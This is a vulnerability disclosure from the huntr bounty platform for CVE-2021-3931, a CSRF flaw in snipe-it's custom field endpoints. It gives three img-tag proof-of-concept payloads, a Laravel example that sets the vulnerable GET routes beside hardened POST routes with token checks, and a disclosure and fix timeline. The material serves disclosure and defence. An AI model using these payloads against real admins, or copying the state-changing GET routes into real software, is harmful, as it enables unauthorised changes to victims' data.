CVE-2021-3931: huntr: Cross-Site Request Forgery (CSRF) PHP Vulnerability in snipe-it
snipe-it is vulnerable to Cross-Site Request Forgery (CSRF)
Status: Valid
Description
CSRF in custom field settings: the endpoints that disassociate a custom field from a fieldset and that mark a field as required or optional perform these state changes on plain GET requests with no CSRF token, so any page an attacker controls can trigger them from a logged-in admin's browser.
Proof of Concept
<img src="http://<SNIPE_IT_APP>/fields/1/fieldset/1/disassociate">
<img src="http://<SNIPE_IT_APP>/fields/required/3/3">
<img src="http://<SNIPE_IT_APP>/fields/optional/3/3">
Impact
This vulnerability can trick an admin user into unknowingly modifying custom forms (custom field settings).
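The weak pattern behind this report beside a hardened form, as an added Laravel illustration (not snipe-it's own code and not the content of the fix commit). The route paths follow the three PoC URLs above; the controller class, method names and route parameter names are assumed.

```php
<?php
// Added example, not snipe-it's own code. Route shapes follow the three
// PoC URLs in this report; controller and method names are assumed.
use Illuminate\Support\Facades\Route;
use App\Http\Controllers\CustomFieldsController; // assumed name

// Weak: state-changing actions reachable via GET. Laravel's VerifyCsrfToken
// middleware only checks POST/PUT/PATCH/DELETE, so a GET that changes data is
// never token-checked. A page that embeds
//   <img src="http://<SNIPE_IT_APP>/fields/1/fieldset/1/disassociate">
// makes a logged-in admin's browser perform the change.
Route::get('fields/{field}/fieldset/{fieldset}/disassociate',
    [CustomFieldsController::class, 'disassociate']);
Route::get('fields/required/{field}/{fieldset}',
    [CustomFieldsController::class, 'required']);
Route::get('fields/optional/{field}/{fieldset}',
    [CustomFieldsController::class, 'optional']);

// Hardened: the same actions accept POST only. Routes in routes/web.php
// already carry the 'web' group, whose VerifyCsrfToken middleware rejects a
// POST without a valid _token (419). An <img> tag cannot issue a POST, and a
// cross-site form post has no way to obtain the victim's session token.
Route::middleware('auth')->group(function () {
    Route::post('fields/{field}/fieldset/{fieldset}/disassociate',
        [CustomFieldsController::class, 'disassociate'])
        ->name('fields.disassociate');
    Route::post('fields/required/{field}/{fieldset}',
        [CustomFieldsController::class, 'required'])
        ->name('fields.required');
    Route::post('fields/optional/{field}/{fieldset}',
        [CustomFieldsController::class, 'optional'])
        ->name('fields.optional');
});

// The legitimate admin UI then submits through a token-bearing form; in a
// Blade view the @csrf directive emits the hidden _token field:
//
//   <form method="POST"
//         action="{{ route('fields.disassociate', [$field, $fieldset]) }}">
//       @csrf
//       <button type="submit">Disassociate</button>
//   </form>
```

A quick regression check for a defender is to request each of the three paths with GET while logged in and confirm the response is 405 Method Not Allowed rather than a changed record.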
Occurrences
We are processing your report and will contact the snipe/snipe-it team within 24 hours. 8 days ago
We have contacted a member of the snipe/snipe-it team and are waiting to hear back 7 days ago
snipe validated this vulnerability 7 days ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
snipe confirmed that a fix has been merged on 0d811d 7 days ago
snipe has been awarded the fix bounty